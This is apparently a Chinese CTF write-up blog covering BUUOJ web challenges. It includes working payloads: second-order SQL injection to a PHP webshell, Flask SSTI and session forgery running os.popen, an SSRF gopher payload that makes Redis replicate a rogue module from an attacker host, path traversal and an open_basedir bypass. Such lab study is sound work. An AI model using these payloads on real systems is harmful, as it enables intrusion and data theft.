直接外带内容

服务器上监听对应端口

[XDCTF 2015]filemanager

2021.2.4

考点

代码审计

文件泄露。

做题步骤

测试文件上传漏洞，发现没有成功。

于是扫目录

下载源码审计

主要是 upload.php 和 rename.php

upload.php

<?php
/**
 * Created by PhpStorm.
 * User: phithon
 * Date: 15/10/14
 * Time: 下午8:45
 */

require_once "common.inc.php";

if ($_FILES) {
	$file = $_FILES["upfile"];
	if ($file["error"] == UPLOAD_ERR_OK) {
		$name = basename($file["name"]);
		$path_parts = pathinfo($name);
		// 限制上传的内容 后缀为  gif jpg png zip txt
		if (!in_array($path_parts["extension"], array("gif", "jpg", "png", "zip", "txt"))) {
			exit("error extension");
		}
		$path_parts["extension"] = "." . $path_parts["extension"];

		$name = $path_parts["filename"] . $path_parts["extension"];

		// $path_parts["filename"] = $db->quote($path_parts["filename"]);
		// Fix
		// 对我们的上传文件的 filename 加转义
		// 且下面的 sql 语句没有进行 其他检测等。
		// 可能会引起后面利用的二次注入。
		$path_parts['filename'] = addslashes($path_parts['filename']);
		$sql = "select * from `file` where `filename`='{$path_parts['filename']}' and `extension`='{$path_parts['extension']}'";

		$fetch = $db->query($sql);

		if ($fetch->num_rows > 0) {
			exit("file is exists");
		}

		if (move_uploaded_file($file["tmp_name"], UPLOAD_DIR . $name)) {
			$sql = "insert into `file` ( `filename`, `view`, `extension`) values( '{$path_parts['filename']}', 0, '{$path_parts['extension']}')";
			$re = $db->query($sql);
			if (!$re) {
				print_r($db->error);
				exit;
			}
			$url = "/" . UPLOAD_DIR . $name;
			echo "Your file is upload, url:
                <a href=\"{$url}\" target='_blank'>{$url}</a><br/>
                <a href=\"/\">go back</a>";
		} else {
			exit("upload error");
		}

	} else {
		print_r(error_get_last());
		exit;
	}
}

rename.php

<?php
/**
 * Created by PhpStorm.
 * User: phithon
 * Date: 15/10/14
 * Time: 下午9:39
 */

require_once "common.inc.php";

// 根据我们输入的 oldname 和 newname 来进行匹配。 利用 oldname 取出。
if (isset($req['oldname']) && isset($req['newname'])) {
	$result = $db->query("select * from `file` where `filename`='{$req['oldname']}'");
	if ($result->num_rows > 0) {
		$result = $result->fetch_assoc();
	} else {
		exit("old file doesn't exists!");
	}

	if ($result) {
		$req['newname'] = basename($req['newname']);
		// 这里会调用 我们的 filename 键值，因为保存的时候加了转义字符，所以这里可能存在二次注入
		// 对数据库 存储内容今夕处理、
		$re = $db->query("update `file` set `filename`='{$req['newname']}', `oldname`='{$result['filename']}' where `fid`={$result['fid']}");
		if (!$re) {
			print_r($db->error);
			exit;
		}
		// 我们的文件会利用名字 + 文件后缀。
		// 因为我们要得到 php 后缀的文件。只能利用这里来构造。
		// 上面的 update 的 sql 语句存在二次注入，所以我们可以利用这个点来实现构造 php 后缀文件。
		// 想到的应该是 数据库中村粗的 extension 为空这样我们就能直接伪造 php 后缀文件
		$oldname = UPLOAD_DIR . $result["filename"] . $result["extension"];
		$newname = UPLOAD_DIR . $req["newname"] . $result["extension"];
		// 如果存在 oldname 的文件 那就会修改名字
		if (file_exists($oldname)) {
			rename($oldname, $newname);
		}
		$url = "/" . $newname;
		echo "Your file is rename, url:
                <a href=\"{$url}\" target='_blank'>{$url}</a><br/>
                <a href=\"/\">go back</a>";
	}
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>file manage</title>
    <base href="/">
    <meta charset="utf-8" />
</head>
<h3>Rename</h3>
<body>
<form method="post">
    <p>
        <span>old filename(exclude extension)：</span>
        <input type="text" name="oldname">
    </p>
    <p>
        <span>new filename(exclude extension)：</span>
        <input type="text" name="newname">
    </p>
    <p>
        <input type="submit" value="rename">
    </p>
</form>
</body>
</html>

首先我们要够着能在 rename 里面利用且利用里面的 upload sql 语句修改 extension 为空的文件名

这样我们在执行的upload 的时候就能利用。

且下次修改文件时就能直接给文件名字为 xxx.php文件
语句为
1
"update `file` set `filename`='{$req['newname']}', `oldname`='{$result['filename']}' where `fid`={$result['fid']}"
这里我们要构造的文件名应该为。

',extension='.txt 等，这样构造出来我们运行的时候的sql 语句为
1
"update `file` set `filename`='{$req['newname']}', `oldname`='',extension='' where `fid`={$result['fid']}"
因为这里利用的是 fid 来匹配的对应文件数据库，所以这里我们可以不管 oldname。

这样运行后对应 filename 的文件的 extension 为空
因为我们的这个 extension 已经为空，我们再次去修改文件名的时候，就能实现修改文件名为 xxx.php+file['extension'] 因为 file['extension'] 为空所以文件会被修改为 xxx.php

上传修改名字为 shell.txt

这个时候后台已经将 extension 置空

这个 txt 是之前查询的结果

然后再上传一个 shell.txt 文件。

然后修改 shell.txt 文件为 shell.php

一句话链接得到flag

为什么要上传两个文件。

因为 upload 和 rename 不是同步的。

你只是修改 ',extension='.txt 为 shell.txt 这个时候

我们修改的文件名字为 shell.txt.txt 数据库里面的名字为 filename=shell.txt extension=0

这个时候是不同步的。

一种方法是上传一个 shell.txt 文件进行绕过修改。

还有一种是修改 ',extension='.txt 为 shell.txt.txt 这样我们的数据库中的文件名和 upload 文件夹下的文件名就是对应的。

[watevrCTF-2019]Supercalc

2021.2.4

考点

做题步骤

存在页面计算

测试 {{7*7}} 可能是 SSTI

扫下目录

没有东西

因为是个计算。我们测试一些不能出现的计算比如除数为0 啊之类的

发现报错

报错也会带出我们的输入 1/0 那ssti 注入这里可以测试吗？

输入 1/0{{7*7}} 会报错

然后查看wp 知道可以利用 # 绕过

成功执行

这里一般我们会去查看 config 的内容

发现里面有个 SECRET_KEY 猜测这里应该有 flask 的session 伪造的事。

发现我们的 session 解密出来发现里面保存的是我们的输入的运行内容

所以我们看看能不能构造这里的内容来实现 ssti 。

1	py3 flask_session_cookie_manager3.py encode -s "cded826a1e89925035cc05f0907855f7" -t "{\"history\": [{\"code\": '__import__(\"os\").popen(\"cat flag.txt\").read()'}]}"

修改session 后得到 flag

[CSAWQual 2016]i_got_id

2021.2.4

考点

Perl 后端。

做题步骤

在 HOME 中看到

应该是 Perl

然后分别是

表单提交

文件上传

可以知道是 perl 文件上传且上传后会显示我们的文件内容。

不会了

https://blog.csdn.net/weixin_44037296/article/details/112283424

对于读文件，如果传入一个ARGV的文件，那么Perl会将传入的参数作为文件名读出来。
所以，在上传的正常文件前加上一个文件上传项ARGV，然后在URL中传入文件路径参数，就可以读取任意文件。

[RootersCTF2019]ImgXweb

2021.2.9

考点

做题步骤

然后上传文件可以上传 php 文件，图片形式显示。访问php 文件会直接下载说明不能解析。

存在 session_id

是 jwt 加密

存在 user

且我们注册 admin 账户的时候已经存在。这里可能需要伪造session 为 admin账户。

扫下目录

有个 robots.txt

有问文件

访问

利用这个字符串加密

替换session 访问主页

发现有个 flag.png

访问查看源码得到 flag

[网鼎杯 2020 玄武组]SSRFMe

2021.2.13

考点

Ssrf 内网

redis 主从复制 getshell

做题步骤

得到源码

<?php
function check_inner_ip($url)
{
    $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url);
    if (!$match_result)
    {
        die('url fomat error');
    }
    try
    {
        $url_parse=parse_url($url);
    }
    catch(Exception $e)
    {
        die('url fomat error');
        return false;
    }
    $hostname=$url_parse['host'];
    $ip=gethostbyname($hostname);
    $int_ip=ip2long($ip);
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;
}

function safe_request_url($url)
{

    if (check_inner_ip($url))
    {
        echo $url.' is inner ip';
    }
    else
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        $output = curl_exec($ch);
        $result_info = curl_getinfo($ch);
        if ($result_info['redirect_url'])
        {
            safe_request_url($result_info['redirect_url']);
        }
        curl_close($ch);
        var_dump($output);
    }

}
if(isset($_GET['url'])){
    $url = $_GET['url'];
    if(!empty($url)){
        safe_request_url($url);
    }
}
else{
    highlight_file(__FILE__);
}
// Please visit hint.php locally.
?>

首先知道有个 hint.php 我们要想办法去查看里面的内容。

我们传入的参数会经过 safe_request_url() 函数处理

然后调用 check_inner_ip() 函数判断是不是内网 ip

首先想到的是使用 ssrf

绕过方法为

https://www.anquanke.com/post/id/86527

首先我们去得到 hint.php

当 php_url_parse 认为 google.com 为目标的同时，curl 认为 evil.com:80 是目标。

这里我们可以利用

http://0.0.0.0/hint.php

http:///127.0.0.1/hint.php 这里是利用他的解析错误。parse_url 会返回 false

 <?php
if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){
  highlight_file(__FILE__);
}
if(isset($_POST['file'])){
  file_put_contents($_POST['file'],"<?php echo 'redispass is root';exit();".$_POST['file']);
}

知道这里有个 redispass 为 root

所以应该是会利用到 redis 的写 shell

因为这里用到的是 file_put_contents 所以应该是可以利用伪协议来写 shell

但是好像没有写权限。这里我们利用 redis 主从复制来 RCE

https://paper.seebug.org/975/

1.本地编译好外部扩展即so文件
2.把so文件转码存入本地redis数据库
3.到目标服务器上设置主从关系，主服务器指定我们的本地机子
4.待同步后，设置备份路径和备份文件名（xx.so）
5.开始同步，备份数据库
6.然后加载备份数据库
7.然后就可以通过redis执行命令反弹shell了

在服务器中下载

https://github.com/xmsec/redis-ssrf

https://github.com/n0b0dyCN/redis-rogue-server

利用 redis-ssrf.py

修改

生成的 payload url 编码。

然后 vps 里面运行 rogue-server.py

1
2

http://9af69796-5d15-47bc-a599-c22972f5b994.node3.buuoj.cn/
?url=gopher%3A%2F%2F0.0.0.0%3A6379%2F_%252A2%250D%250A%25244%250D%250AAUTH%250D%250A%25244%250D%250Aroot%250D%250A%252A3%250D%250A%25247%250D%250ASLAVEOF%250D%250A%252413%250D%250A172.25.33.227%250D%250A%25244%250D%250A6666%250D%250A%252A4%250D%250A%25246%250D%250ACONFIG%250D%250A%25243%250D%250ASET%250D%250A%25243%250D%250Adir%250D%250A%25245%250D%250A%2Ftmp%2F%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25246%250D%250Aexp.so%250D%250A%252A3%250D%250A%25246%250D%250AMODULE%250D%250A%25244%250D%250ALOAD%250D%250A%252411%250D%250A%2Ftmp%2Fexp.so%250D%250A%252A2%250D%250A%252411%250D%250Asystem.exec%250D%250A%252414%250D%250Acat%2524%257BIFS%257D%2Fflag%250D%250A%252A1%250D%250A%25244%250D%250Aquit%250D%250A

访问得到 flag

[pasecactf_2019]flask_ssti

2021.2.14

考点

Ssti 绕过 '_.

https://www.jianshu.com/p/a736e39c3510

做题步骤

对应部分源码

def encode(line, key, key2):
    return ''.join(chr(x ^ ord(line[x]) ^ ord(key[::-1][x]) ^ ord(key2[x])) for x in range(len(line)))

app.config['flag'] = encode('', 'GQIS5EmzfZA1Ci8NslaoMxPXqrvFB7hYOkbg9y20W34', 'xwdFqMck1vA0pl7B8WO3DrGLma4sZ2Y6ouCPEHSQVT5')

先进行测试

存在 ssti 注入

首先要去找到 object 类。然后想办法去的看看有没有能系统调用的函数能够引用

发现这些符号都被规律了 _ . '

利用对应的 hex 码进行绕过单引号可以利用 “”

“\x5f”是字符 ”_“，”\x2E”是字符 “.”

1	{{()["\x5f\x5fclass\x5f\x5f"]}}

获得类

继续向上获取

获得对应值 object 类

1	{{()["\x5f\x5fclass\x5f\x5f"]["\x5F\x5Fbases\x5F\x5F"]}}

然后获取全部子类

1	{{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()}}

读取文件可以这样写（_frozen_importlib_external.FileLoader’的get_data()方法，第一个是参数0，第二个文件名）

1	{{()["\x5F\x5Fclass\x5F\x5F"]["\x5F\x5Fbases\x5F\x5F"][0]["\x5F\x5Fsubclasses\x5F\x5F"]()[91]["get\x5Fdata"](0, "app\x2Epy")}}

得到字符串

import random
from flask import Flask, render_template_string, render_template, request
import os

app = Flask(__name__)
app.config['SECRET_KEY'] = 'folow @osminogka.ann on instagram =)\'

#Tiaonmmn don't remember to remove this part on deploy so nobody will solve that hehe
'''
def encode(line, key, key2):
    return ''.join(chr(x ^ ord(line[x]) ^ ord(key[::-1][x]) ^ ord(key2[x])) for x in range(len(line)))

app.config['flag'] = encode('', 'GQIS5EmzfZA1Ci8NslaoMxPXqrvFB7hYOkbg9y20W3', 'xwdFqMck1vA0pl7B8WO3DrGLma4sZ2Y6ouCPEHSQVT')
'''

def encode(line, key, key2):
    return ''.join(chr(x ^ ord(line[x]) ^ ord(key[::-1][x]) ^ ord(key2[x])) 

for x in range(len(line)))
file = open("/app/flag", "r")
flag = file.read()
flag = flag[:42]
app.config['flag'] = encode(flag, 'GQIS5EmzfZA1Ci8NslaoMxPXqrvFB7hYOkbg9y20W3', 'xwdFqMck1vA0pl7B8WO3DrGLma4sZ2Y6ouCPEHSQVT')
flag = ""
os.remove("/app/flag")

nicknames = ['\xcb\x9c\xe2\x80\x9d*\xc2\xb0\xe2\x98\x85\xe2\x98\x86\xe2\x98\x85_%s_\xe2\x98\x85\xe2\x98\x86\xe2\x98\x85\xc2\xb0\xc2\xb0*\', \'%s ~\xe2\x99\xa1\xe2\x93\x9b\xe2\x93\x9e\xe2\x93\xa5\xe2\x93\x94\xe2\x99\xa1~', '%s \xd0\x92\xc3\xaa\xd1\x87\xd2\xa3\xc3\xb8 \xd0\xb2 \xc3\xb8\xc4\xa4\xd0\xbb\xc3\xa2\xd0\xb9\xc4\xa4\xc3\xa9', '\xe2\x99\xaa \xe2\x99\xaa \xe2\x99\xaa %s \xe2\x99\xaa \xe2\x99\xaa \xe2\x99\xaa ', '[\xe2\x99\xa5\xe2\x99\xa5\xe2\x99\xa5%s\xe2\x99\xa5\xe2\x99\xa5\xe2\x99\xa5]', '%s, kO\xd1\x82O\xc2\xaeA\xd1\x8f )(\xd0\xbe\xd0\xa2\xd0\xb5\xd0\x9b@ \xc2\xa94@$t\xd1\x8c\xd0\xaf', '\xe2\x99\x94%s\xe2\x99\x94', '[\xe2\x99\x82+\xe2\x99\x82=\xe2\x99\xa5]%s[\xe2\x99\x82+\xe2\x99\x82=\xe2\x99\xa5]']

@app.route('/', methods=['GET', 'POST'])
def index():
    if request.method == 'POST':
        try:
            p = request.values.get('nickname')
            id = random.randint(0, len(nicknames) - 1)
            if p != None:
                if '.' in p or '_' in p or '\'' in p:
                    return 'Your nickname contains restricted characters!'
            return render_template_string(nicknames[id] % p)
                    
        except Exception as e:
            print(e)
            return 'Exception'
            return render_template('index.html')
                        
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=1337)

因为我们知道文件打开了但是没有关闭就删除了文件流

所以我们读取文件流就能得到 flag

利用

1	{{()["\x5F\x5Fclass\x5F\x5F"]["\x5F\x5Fbases\x5F\x5F"][0]["\x5F\x5Fsubclasses\x5F\x5F"]()[91]["get\x5Fdata"](0, "/proc/self/fd/3")}}

[BSidesCF 2020]Hurdles

2021.2.15

考点

http 头

https://guokeya.github.io/post/-jTl-F23v/

做题步骤

按照要求一次修改发送包

新：

HTTP基本认证 - HTTP Basic Authentication
Basic认证遵循如上质询流程，当服务器返回401响应后，客户端的请求需要带上用户认证信息：将用户名和密码以:接起来，然后用Base64编码得到一串字符。然后在HTTP请求中添加一个Authorization首部，格式为Basic YourEncodededBase64String。

举个例子，假设用户名为test，密码为123456，/authAPI使用HTTP Basic认证，那么我们访问这个API的HTTP请求如下：

GET /auth HTTP/1.1
Authorization: Basic dGVzdDoxMjM0NTY=
Host: localhost:8080
上面的dGVzdDoxMjM0NTY=这串字符就等于test:123456使用Base64编码的结果。

传入 Authorization: Basic cGxheWVyOjE= cGxheWVyOjE= 为 player:1

PUT /hurdles/!?get=flag&%26%3d%26%3d%26=%2500%0a HTTP/1.1
Host: node3.buuoj.cn:27079
Cache-Control: max-age=0
Authorization: Basic cGxheWVyOjU0ZWYzNmVjNzEyMDFmZGY5ZDE0MjNmZDI2Zjk3ZjZi
Upgrade-Insecure-Requests: 1
User-Agent: 1337 v.9000 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Origin: https://ctf.bsidessf.net
Accept: text/plain
Referer: https://ctf.bsidessf.net/challenges
Accept-Encoding: gzip, deflate
X-Forwarded-For: 13.37.13.37,127.0.0.1  // 设置代理
Accept-Language:ru  //设置为 俄语
Cookie: track_uuid=ca82c94f-a15b-4270-8947-404b385c02a4; UM_distinctid=1766fe38d35a2b-0d115f068fffa3-163a6153-384000-1766fe38d36a4b; Fortune=6265 // RFC 编号
Connection: close

2021.2.21

考点

目录穿透

做题步骤

网页是一个拧魔方的页面。交互只有玩魔方，

于是就扫目录。抓包。

抓包没什么提示 flag 位置

扫目录。

upload 存在文件上传但是没有实现文件上传功能

Uploads 文件目录

存在一个图片点击会下载

访问的路由是

http://5de34eb7-6ca7-48b2-b9d4-877e0bf0d83f.node3.buuoj.cn/preview?f=favicon.ico

可以试试这个能不能出现目录穿透。

我们输入的 ../../ 发现被过滤了

我们利用双写看看

preview?f=....//....//....//....//....//....//etc..//passwd

得到内容

前面说 flag flag in f1ag_Is_h3re

preview?f=....//....//....//....//....//....//f1ag_Is_h3re..//flag

得到 flag

[De1CTF 2019]Giftbox

2021.2.24

考点

sql 注入

open_basedir 绕过

https://www.zhaoj.in/read-6170.html#0x03Giftbox

做题步骤

打开是一个 macos 终端

Usage.md 中告诉我们对应的指令

还可以利用 Help 指令查看存在的指令

运行 md 里面的指令后发现必须要先登录

首先我们需要登录，这里看看怎么登录 admin 账号

测试是否能利用 sql 注入。

发现是可以进行注入的。注入点在 username。

我们抓包看看情况。

发送的数据包包括。我们的输入还有一个 totp 的值。

这个 totp 好像是一个时间限制

我们利用上面的 sql 注入的时候，害需要获得 totp 当前值才能写出爆破 exp。

totp

我们要找到对应点 totp 生成数据的位置

查找有没有需要的数据。

然后看到 main.js

有个提示，就是我们对应的 totp 的算法的位置

压缩包里面是程序对应的 py 代码。

且在 main.js 中找到了对应的 Url 请求的链接

这里我们就可以利用 python 的

Pyotp 库来生成对应的 totp值

利用 flask 搭建一个中间利用

import pyotp
import requests
import string
from flask import Flask
import time
app=Flask(__name__)
totp=pyotp.TOTP('GAXG24JTMZXGKZBU',digits=8,interval=5)
s=requests.session()
fuzz=string.printable
@app.route('/username=<username>')
def hack(username):
    url='http://dafd9c16-0a72-4c91-8242-81677b5b38ed.node3.buuoj.cn//shell.php'
    username=(username).replace(' ','/**/')
    params={
        'a':'login {} admin'.format(username),
        'totp':totp.now()
    }
    time.sleep(0.5)
    res = s.get(url,params=params)
    return res.content

if __name__ == '__main__':
    app.run(debug=True)

然后我们对这个本地服务跑就行

./sqlmap.py -u "http://127.0.0.1:5000/username=admin*" -D giftbox -T users -C password --dump --technique B

用 sql map 跑出来

根据密码提示新指令 sh0w_hiiintttt_23333

进行登录

然后发现

这里面的命令

1
2
3

targeting code position    $code = "position"
launch                     遍历一遍 targeting 的赋值
destuct                    清空内容

尝试调用 phpinfo

运行返回内容在保存后打开就能看到返回的phpinfo 的内容了

看一下里面的关键内容

open_basedir disablefunction

我们要查看的是 /flag 文件

所以这里需要利用绕过 open_basedir 的方法

1	chdir('js');ini_set('open_basedir','..');chdir('..');chdir('/');ini_set('open_basedir','/');printf(file_get_contents('flag'));

targeting a chr
targeting b {$a(46)}    {$a(.)}
targeting c {$b}{$b}
targeting d {$a(47)}		{$a(/)}
targeting e js
targeting f open_basedir
targeting g chdir
targeting h ini_set
targeting i file_get_
targeting j {$i}contents    file_get_contents  因为有长度限制
targeting k {$g($e)}
targeting l {$h($f,$c)}
targeting m {$g($c)}
targeting n {$h($f,$d)}
targeting o {$d}flag
targeting p {$j($o)}
targeting q printf
targeting r {$q($p)}

[N1CTF 2018]eating_cms

考点

做题步骤

[HarekazeCTF2019]Easy Notes

考点

做题步骤

[SWPU2019]Web3

考点

做题步骤

[网鼎杯 2020 青龙组]notes

考点

做题步骤

[watevrCTF-2019]Pickle Store

考点

做题步骤

[RCTF 2019]Nextphp

考点

做题步骤

[RootersCTF2019]babyWeb

考点

做题步骤

[FireshellCTF2020]Caas

考点

做题步骤

[NESTCTF 2019]Love Math 2

考点

做题步骤

[GYCTF2020]Node Game

考点

做题步骤

[NPUCTF2020]验证🐎

考点

做题步骤

[GWCTF 2019]你的名字

考点

做题步骤

[XDCTF 2015]filemanager

考点

做题步骤

[watevrCTF-2019]Supercalc

考点

做题步骤

[CSAWQual 2016]i_got_id

考点

做题步骤

[RootersCTF2019]ImgXweb

考点

做题步骤

[网鼎杯 2020 玄武组]SSRFMe

考点

做题步骤

[pasecactf_2019]flask_ssti

考点

做题步骤

[BSidesCF 2020]Hurdles

考点

做题步骤

virink_2019_files_share

考点

做题步骤

[De1CTF 2019]Giftbox

考点

做题步骤